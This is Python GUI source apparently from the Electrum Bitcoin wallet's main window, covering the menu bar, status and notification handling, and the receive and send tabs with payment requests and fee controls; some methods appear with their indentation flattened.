        file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
        file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
        file_menu.addAction(_("Delete"), self.remove_wallet)
        file_menu.addSeparator()
        file_menu.addAction(_("&Quit"), self.close)
        # --- Wallet ---
        wallet_menu = menubar.addMenu(_("&Wallet"))
        wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
        wallet_menu.addSeparator()
        self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
        self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
        self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
        self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
        self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
        self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
        self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
        wallet_menu.addSeparator()
        addresses_menu = wallet_menu.addMenu(_("&Addresses"))
        addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
        labels_menu = wallet_menu.addMenu(_("&Labels"))
        labels_menu.addAction(_("&Import"), self.do_import_labels)
        labels_menu.addAction(_("&Export"), self.do_export_labels)
        history_menu = wallet_menu.addMenu(_("&History"))
        history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
        history_menu.addAction(_("&Summary"), self.history_list.show_summary)
        history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
        history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
        contacts_menu = wallet_menu.addMenu(_("Contacts"))
        contacts_menu.addAction(_("&New"), self.new_contact_dialog)
        contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
        contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
        invoices_menu = wallet_menu.addMenu(_("Invoices"))
        invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
        invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
        # --- View (optional tab toggles) ---
        def add_toggle_action(view_menu, tab):
            is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
            item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
            tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
        view_menu = menubar.addMenu(_("&View"))
        add_toggle_action(view_menu, self.addresses_tab)
        add_toggle_action(view_menu, self.utxo_tab)
        add_toggle_action(view_menu, self.contacts_tab)
        add_toggle_action(view_menu, self.console_tab)
        # --- Tools ---
        tools_menu = menubar.addMenu(_("&Tools"))
        # Settings / Preferences are all reserved keywords in macOS using this as work around
        tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
        tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
        tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
        tools_menu.addSeparator()
        tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
        tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
        tools_menu.addSeparator()
        paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
        raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
        raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
        raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
        raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
        raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
        self.raw_transaction_menu = raw_transaction_menu
        run_hook('init_menubar_tools', self, tools_menu)
        # --- Help ---
        help_menu = menubar.addMenu(_("&Help"))
        help_menu.addAction(_("&About"), self.show_about)
        help_menu.addAction(_("&Check for updates"), self.show_update_check)
        help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org"))
        help_menu.addSeparator()
        help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
        help_menu.addAction(_("&Report Bug"), self.show_report_bug)
        help_menu.addSeparator()
        help_menu.addAction(_("&Donate to server"), self.donate_to_server)
        self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
    def show_about(self):
        """Show the About dialog with version and project blurb."""
        QMessageBox.about(self, "Electrum",
                          (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                           _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
                           _("You do not need to perform regular backups, because your wallet can be "
                             "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                           _("Startup times are instant because it operates in conjunction with high-performance "
                             "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
                           _("Uses icons from the Icons8 icon pack (icons8.com).")))
    def show_update_check(self, version=None):
        """Open the update-check dialog (reference held on gui_object to
        prevent premature garbage collection)."""
        self.gui_object._update_check = UpdateCheck(self, version)
    def show_report_bug(self):
        """Show the bug-reporting instructions dialog (rich text with link)."""
        msg = ' '.join([
            _("Please report any bugs as issues on github:<br/>"),
            "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
            _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
            _("Try to explain not only what the bug is, but how it occurs.")
        ])
        self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
    def notify(self, message):
        """Show *message* as a system-tray balloon notification, preferring
        the icon overload (Qt >= 5.9) and falling back to the enum one."""
        if self.tray:
            try:
                # this requires Qt 5.9
                self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
            except TypeError:
                self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
    def timer_actions(self):
        """Periodic housekeeping driven by the shared GUI timer:
        refresh the wallet view, resolve payto aliases, recompute the fee
        when flagged, and flush pending transaction notifications."""
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        # update fee
        if self.require_fee_update:
            self.do_update_fee()
            self.require_fee_update = False
        self.notify_transactions()
    def format_amount(self, x, is_diff=False, whitespaces=False):
        """Format satoshi amount *x* using the window's decimal point and
        zero-padding settings (no unit suffix)."""
        return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
    def format_fee_rate(self, fee_rate):
        """Format *fee_rate* (given in sat/kB) as a 'sat/byte' string."""
        # fee_rate is in sat/kB
        return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
    def get_decimal_point(self):
        """Return the current decimal point (base-unit exponent) setting."""
        return self.decimal_point
    def base_unit(self):
        """Return the display unit name (e.g. 'BTC', 'mBTC') for the
        current decimal point setting."""
        return decimal_point_to_base_unit_name(self.decimal_point)
    def connect_fields(self, window, btc_e, fiat_e, fee_e):
        """Keep a BTC amount edit and its fiat counterpart in sync.

        Editing either field recomputes the other from the current exchange
        rate.  The 'follows' flag breaks the feedback loop between the two
        textChanged handlers; 'is_last_edited' records which field the user
        touched last (used by on_fx_quotes).  If *fee_e* is given, the
        window's fee is recomputed after a fiat-driven BTC change.
        """
        def edit_changed(edit):
            if edit.follows:
                # change was programmatic (made by this very handler); ignore
                return
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
            if rate.is_nan() or amount is None:
                # no rate or empty amount: clear the counterpart field(s)
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False
        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False
    def update_status(self):
        """Refresh the status-bar balance text, tray tooltip and connection
        icon based on network state and wallet sync progress."""
        if not self.wallet:
            return
        if self.network is None:
            text = _("Offline")
            icon = read_QIcon("status_disconnected.png")
        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            # "_fork" icon variants signal that multiple chains are being followed
            fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
            # Server height can be 0 after switching to a new server
            # until we get a headers subscription request response.
            # Display the synchronizing message in that case.
            if not self.wallet.up_to_date or server_height == 0:
                text = _("Synchronizing...")
                icon = read_QIcon("status_waiting.png")
            elif server_lag > 1:
                text = _("Server is lagging ({} blocks)").format(server_lag)
                icon = read_QIcon("status_lagging%s.png"%fork_str)
            else:
                # confirmed / unconfirmed / unmatured balances
                c, u, x = self.wallet.get_balance()
                text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
                if u:
                    text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
                if x:
                    text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
                # append fiat balance and price
                if self.fx.is_enabled():
                    text += self.fx.get_fiat_status_text(c + u + x,
                        self.base_unit(), self.get_decimal_point()) or ''
                if not self.network.proxy:
                    icon = read_QIcon("status_connected%s.png"%fork_str)
                else:
                    icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
        else:
            if self.network.proxy:
                text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
            else:
                text = _("Not connected")
            icon = read_QIcon("status_disconnected.png")
        self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
        self.balance_label.setText(text)
        self.status_button.setIcon( icon )
    def update_wallet(self):
        """Refresh the status bar, and refresh all tabs once the wallet is
        fully synced (or when there is no network to sync against)."""
        self.update_status()
        if self.wallet.up_to_date or not self.network or not self.network.is_connected():
            self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
    def create_history_tab(self):
        """Create the History tab: model + list view + filter toolbar."""
        self.history_model = HistoryModel(self)
        self.history_list = l = HistoryList(self, self.history_model)
        self.history_model.set_view(self.history_list)
        # the list is its own search target for the Find feature
        l.searchable_list = l
        toolbar = l.create_toolbar(self.config)
        toolbar_shown = self.config.get('show_toolbar_history', False)
        l.show_toolbar(toolbar_shown)
        return self.create_list_tab(l, toolbar)
    def show_address(self, addr):
        """Open the modal address-details dialog for *addr*."""
        from . import address_dialog
        d = address_dialog.AddressDialog(self, addr)
        d.exec_()
    def show_transaction(self, tx, tx_desc = None):
        '''tx_desc is set only for txs created in the Send tab'''
        show_transaction(tx, self, tx_desc)
    def create_receive_tab(self):
        """Build the Receive tab: address/description/amount inputs, an
        expiration selector, Save/New buttons, a live QR code preview, and
        the list of existing payment requests.  Returns the tab widget."""
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.receive_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)
        self.receive_address_e = ButtonsLineEdit()
        self.receive_address_e.addCopyButton(self.app)
        self.receive_address_e.setReadOnly(True)
        msg = _('Bitcoin address where the payment should be received. Note that each payment request uses a different Bitcoin address.')
        self.receive_address_label = HelpLabel(_('Receiving address'), msg)
        self.receive_address_e.textChanged.connect(self.update_receive_qr)
        self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
        grid.addWidget(self.receive_address_label, 0, 0)
        grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
        self.receive_message_e = QLineEdit()
        grid.addWidget(QLabel(_('Description')), 1, 0)
        grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
        self.receive_message_e.textChanged.connect(self.update_receive_qr)
        self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
        grid.addWidget(QLabel(_('Requested amount')), 2, 0)
        grid.addWidget(self.receive_amount_e, 2, 1)
        self.receive_amount_e.textChanged.connect(self.update_receive_qr)
        # fiat counterpart, kept in sync via connect_fields; hidden when fx is off
        self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_receive_e.setVisible(False)
        grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
        self.expires_combo = QComboBox()
        self.expires_combo.addItems([i[0] for i in expiration_values])
        self.expires_combo.setCurrentIndex(3)
        self.expires_combo.setFixedWidth(self.receive_amount_e.width())
        msg = ' '.join([
            _('Expiration date of your request.'),
            _('This information is seen by the recipient if you send them a signed payment request.'),
            _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
            _('The bitcoin address never expires and will always be part of this electrum wallet.'),
        ])
        grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
        grid.addWidget(self.expires_combo, 3, 1)
        # read-only label shown in place of the combo for saved requests
        self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(1)
        self.expires_label.setFocusPolicy(Qt.NoFocus)
        self.expires_label.hide()
        grid.addWidget(self.expires_label, 3, 1)
        self.save_request_button = QPushButton(_('Save'))
        self.save_request_button.clicked.connect(self.save_payment_request)
        self.new_request_button = QPushButton(_('New'))
        self.new_request_button.clicked.connect(self.new_payment_request)
        # QR preview: click toggles the detached QR window, hover shows hand cursor
        self.receive_qr = QRCodeWidget(fixedSize=200)
        self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
        self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
        self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
        self.receive_buttons = buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.save_request_button)
        buttons.addWidget(self.new_request_button)
        grid.addLayout(buttons, 4, 1, 1, 2)
        self.receive_requests_label = QLabel(_('Requests'))
        from .request_list import RequestList
        self.request_list = RequestList(self)
        # layout
        vbox_g = QVBoxLayout()
        vbox_g.addLayout(grid)
        vbox_g.addStretch()
        hbox = QHBoxLayout()
        hbox.addLayout(vbox_g)
        hbox.addWidget(self.receive_qr)
        w = QWidget()
        w.searchable_list = self.request_list
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.receive_requests_label)
        vbox.addWidget(self.request_list)
        vbox.setStretchFactor(self.request_list, 1000)
        return w
def delete_payment_request(self, addr):
    """Remove the stored payment request for *addr* and refresh the receive UI."""
    self.wallet.remove_payment_request(addr, self.config)
    self.request_list.update()
    self.clear_receive_tab()
def get_request_URI(self, addr):
    """Build a BIP21 payment URI string for the stored request at *addr*.

    Includes optional 'time', 'exp', 'name' and 'sig' query parameters when
    present on the stored request.
    """
    request = self.wallet.receive_requests[addr]
    label = self.wallet.labels.get(addr, '')
    req_amount = request['amount']
    params = {}
    creation_time = request.get('time')
    if creation_time:
        params['time'] = str(int(creation_time))
    expiry = request.get('exp')
    if expiry:
        params['exp'] = str(int(expiry))
    if request.get('name') and request.get('sig'):
        # stored signature is hex; the URI carries it base58-encoded
        encoded_sig = bitcoin.base_encode(bfh(request.get('sig')), base=58)
        params['name'] = request['name']
        params['sig'] = encoded_sig
    uri = util.create_bip21_uri(addr, req_amount, label, extra_query_params=params)
    return str(uri)
def sign_payment_request(self, addr):
    """Sign the payment request at *addr* with the configured alias key, if any.

    Only signs when an 'alias' is configured, self.alias_info has been
    resolved, and the alias address belongs to this wallet.  Prompts for the
    wallet password when keystore encryption is enabled and aborts silently
    if the user cancels; wallet errors are shown in an error dialog.
    """
    alias = self.config.get('alias')
    # note: removed dead local `alias_privkey = None` — it was never read
    if alias and self.alias_info:
        alias_addr, alias_name, validated = self.alias_info
        if alias_addr:
            if self.wallet.is_mine(alias_addr):
                msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                password = None
                if self.wallet.has_keystore_encryption():
                    password = self.password_dialog(msg)
                    if not password:
                        return
                try:
                    self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                except Exception as e:
                    self.show_error(str(e))
                    return
            else:
                return
def save_payment_request(self):
    """Create and store a payment request from the receive-tab fields.

    Returns False when neither a message nor an amount was entered.
    On success the request is stored, signed (if an alias is configured),
    and the request/address lists are refreshed.
    """
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    if not message and not amount:
        self.show_error(_('No message or amount'))
        return False
    i = self.expires_combo.currentIndex()
    # expiration_values is a sequence of (label, seconds) pairs; index it
    # directly instead of materialising the full list of second-values first
    expiration = expiration_values[i][1]
    req = self.wallet.make_payment_request(addr, amount, message, expiration)
    try:
        self.wallet.add_payment_request(req, self.config)
    except Exception as e:
        self.logger.exception('Error adding payment request')
        self.show_error(_('Error adding payment request') + ':\n' + str(e))
    else:
        self.sign_payment_request(addr)
        self.save_request_button.setEnabled(False)
    finally:
        self.request_list.update()
        self.address_list.update()
def view_and_paste(self, title, msg, data):
    """Show *data* in a modal dialog with a QR/text view and a copy button."""
    dlg = WindowModalDialog(self, title)
    layout = QVBoxLayout()
    explanation = QLabel(msg)
    explanation.setWordWrap(True)
    layout.addWidget(explanation)
    text_view = ShowQRTextEdit(text=data)
    layout.addWidget(text_view)
    layout.addLayout(Buttons(CopyCloseButton(text_view.text, self.app, dlg)))
    dlg.setLayout(layout)
    dlg.exec_()
def export_payment_request(self, addr):
    """Serialize the request at *addr* as BIP70 and save it to a user-chosen file."""
    request = self.wallet.receive_requests.get(addr)
    serialized = paymentrequest.serialize_request(request).SerializeToString()
    suggested_name = request['id'] + '.bip70'
    filename = self.getSaveFileName(_("Select where to save your payment request"), suggested_name, "*.bip70")
    if not filename:
        return
    with open(filename, "wb+") as f:
        f.write(util.to_bytes(serialized))
    self.show_message(_("Request saved successfully"))
    self.saved = True
def new_payment_request(self):
    """Pick (or create) a fresh receiving address and reset the receive form.

    When the wallet has no unused address left: non-deterministic wallets get
    an explanatory message and nothing happens; deterministic wallets are asked
    for confirmation before a new address beyond the gap limit is created.
    """
    addr = self.wallet.get_unused_address()
    if addr is None:
        if not self.wallet.is_deterministic():
            msg = [
                _('No more addresses in your wallet.'),
                _('You are using a non-deterministic wallet, which cannot create new addresses.'),
                _('If you want to create new addresses, use a deterministic wallet instead.')
            ]
            self.show_message(' '.join(msg))
            return
        if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
            return
        addr = self.wallet.create_new_address(False)
    self.set_receive_address(addr)
    # reset expiry UI back to the editable combo for a fresh request
    self.expires_label.hide()
    self.expires_combo.show()
    self.new_request_button.setEnabled(False)
    self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
    """Show *addr* in the receive tab and clear the message/amount fields."""
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
    """Reset the receive tab to a blank state with the wallet's receiving address."""
    try:
        addr = self.wallet.get_receiving_address() or ''
    except InternalAddressCorruption as e:
        # report corruption but still clear the form with an empty address
        self.show_error(str(e))
        addr = ''
    self.receive_address_e.setText(addr)
    self.receive_message_e.setText('')
    self.receive_amount_e.setAmount(None)
    self.expires_label.hide()
    self.expires_combo.show()
def toggle_qr_window(self):
    """Show/hide the detached QR window, remembering its screen geometry.

    The window is lazily created on first use; on later toggles its last
    geometry is saved before hiding and restored when shown again.
    """
    from . import qrwindow
    if not self.qr_window:
        self.qr_window = qrwindow.QR_Window(self)
        self.qr_window.setVisible(True)
        self.qr_window_geometry = self.qr_window.geometry()
    else:
        if not self.qr_window.isVisible():
            self.qr_window.setVisible(True)
            self.qr_window.setGeometry(self.qr_window_geometry)
        else:
            self.qr_window_geometry = self.qr_window.geometry()
            self.qr_window.setVisible(False)
    # repopulate the QR contents for whichever window is now visible
    self.update_receive_qr()
def show_send_tab(self):
    """Switch the main tab widget to the Send tab."""
    send_index = self.tabs.indexOf(self.send_tab)
    self.tabs.setCurrentIndex(send_index)
def show_receive_tab(self):
    """Switch the main tab widget to the Receive tab."""
    receive_index = self.tabs.indexOf(self.receive_tab)
    self.tabs.setCurrentIndex(receive_index)
def receive_at(self, addr):
    """Open the receive tab pre-filled with *addr*; ignores invalid addresses."""
    if bitcoin.is_address(addr):
        self.show_receive_tab()
        self.receive_address_e.setText(addr)
        self.new_request_button.setEnabled(True)
def update_receive_qr(self):
    """Regenerate the receive-tab QR code (and detached QR window) from the form."""
    addr = str(self.receive_address_e.text())
    amount = self.receive_amount_e.get_amount()
    message = self.receive_message_e.text()
    # 'Save' only makes sense once there is something to save
    self.save_request_button.setEnabled((amount is not None) or (message != ""))
    uri = util.create_bip21_uri(addr, amount, message)
    self.receive_qr.setData(uri)
    if self.qr_window and self.qr_window.isVisible():
        self.qr_window.qrw.setData(uri)
def set_feerounding_text(self, num_satoshis_added):
    """Store the tooltip/explanation text for *num_satoshis_added* of fee rounding."""
    template = _('Additional {} satoshis are going to be added.')
    self.feerounding_text = template.format(num_satoshis_added)
def create_send_tab(self):
    """Build and return the Send tab widget.

    Creates the payto/description/amount fields, the fee slider plus the
    advanced fee controls (feerate, tx size, absolute fee), the
    Preview/Send/Clear buttons and the invoice list, and wires the signal
    handlers that keep fee state and field colors in sync.
    """
    # A 4-column grid layout. All the stretch is in the last column.
    # The exchange rate plugin adds a fiat widget in column 2
    self.send_grid = grid = QGridLayout()
    grid.setSpacing(8)
    grid.setColumnStretch(3, 1)
    from .paytoedit import PayToEdit
    self.amount_e = BTCAmountEdit(self.get_decimal_point)
    self.payto_e = PayToEdit(self)
    msg = _('Recipient of the funds.') + '\n\n'\
          + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
    payto_label = HelpLabel(_('Pay to'), msg)
    grid.addWidget(payto_label, 1, 0)
    grid.addWidget(self.payto_e, 1, 1, 1, -1)
    # contact auto-completion for the payto field (model filled by update_completions)
    completer = QCompleter()
    completer.setCaseSensitivity(False)
    self.payto_e.set_completer(completer)
    completer.setModel(self.completions)
    msg = _('Description of the transaction (not mandatory).') + '\n\n'\
          + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
    description_label = HelpLabel(_('Description'), msg)
    grid.addWidget(description_label, 2, 0)
    self.message_e = MyLineEdit()
    grid.addWidget(self.message_e, 2, 1, 1, -1)
    # 'From' row: shows explicitly selected coins; hidden when empty
    self.from_label = QLabel(_('From'))
    grid.addWidget(self.from_label, 3, 0)
    self.from_list = FromList(self, self.from_list_menu)
    grid.addWidget(self.from_list, 3, 1, 1, -1)
    self.set_pay_from([])
    msg = _('Amount to be sent.') + '\n\n' \
          + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
          + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
          + _('Keyboard shortcut: type "!" to send all your coins.')
    amount_label = HelpLabel(_('Amount'), msg)
    grid.addWidget(amount_label, 4, 0)
    grid.addWidget(self.amount_e, 4, 1)
    # fiat amount mirror; hidden when no exchange-rate source is enabled
    self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
    if not self.fx or not self.fx.is_enabled():
        self.fiat_send_e.setVisible(False)
    grid.addWidget(self.fiat_send_e, 4, 2)
    self.amount_e.frozen.connect(
        lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
    self.max_button = EnterButton(_("Max"), self.spend_max)
    self.max_button.setFixedWidth(140)
    self.max_button.setCheckable(True)
    grid.addWidget(self.max_button, 4, 3)
    hbox = QHBoxLayout()
    hbox.addStretch(1)
    grid.addLayout(hbox, 4, 4)
    msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
          + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
          + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
    self.fee_e_label = HelpLabel(_('Fee'), msg)

    def fee_cb(dyn, pos, fee_rate):
        # slider moved: persist the chosen level/rate, then recompute
        if dyn:
            if self.config.use_mempool_fees():
                self.config.set_key('depth_level', pos, False)
            else:
                self.config.set_key('fee_level', pos, False)
        else:
            self.config.set_key('fee_per_kb', fee_rate, False)
        if fee_rate:
            fee_rate = Decimal(fee_rate)
            self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
        else:
            self.feerate_e.setAmount(None)
        # slider takes control back from a manually entered fee
        self.fee_e.setModified(False)
        self.fee_slider.activate()
        self.spend_max() if self.max_button.isChecked() else self.update_fee()

    self.fee_slider = FeeSlider(self, self.config, fee_cb)
    self.fee_slider.setFixedWidth(140)

    def on_fee_or_feerate(edit_changed, editing_finished):
        # only one of fee_e / feerate_e may be "modified" (frozen) at a time
        edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
        if editing_finished:
            if edit_changed.get_amount() is None:
                # This is so that when the user blanks the fee and moves on,
                # we go back to auto-calculate mode and put a fee back.
                edit_changed.setModified(False)
        else:
            # edit_changed was edited just now, so make sure we will
            # freeze the correct fee setting (this)
            edit_other.setModified(False)
        self.fee_slider.deactivate()
        self.update_fee()

    class TxSizeLabel(QLabel):
        # read-only label displaying the estimated tx size in bytes
        def setAmount(self, byte_size):
            self.setText(('x %s bytes =' % byte_size) if byte_size else '')

    self.size_e = TxSizeLabel()
    self.size_e.setAlignment(Qt.AlignCenter)
    self.size_e.setAmount(0)
    self.size_e.setFixedWidth(140)
    self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
    self.feerate_e = FeerateEdit(lambda: 0)
    self.feerate_e.setAmount(self.config.fee_per_byte())
    self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
    self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
    self.fee_e = BTCAmountEdit(self.get_decimal_point)
    self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
    self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))

    def feerounding_onclick():
        text = (self.feerounding_text + '\n\n' +
                _('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
                _('At most 100 satoshis might be lost due to this rounding.') + ' ' +
                _("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
                _('Also, dust is not kept as change, but added to the fee.') + '\n' +
                _('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
        QMessageBox.information(self, 'Fee rounding', text)

    # small info icon shown when the displayed fee differs from the actual fee
    self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
    self.feerounding_icon.setFixedWidth(20)
    self.feerounding_icon.setFlat(True)
    self.feerounding_icon.clicked.connect(feerounding_onclick)
    self.feerounding_icon.setVisible(False)
    self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
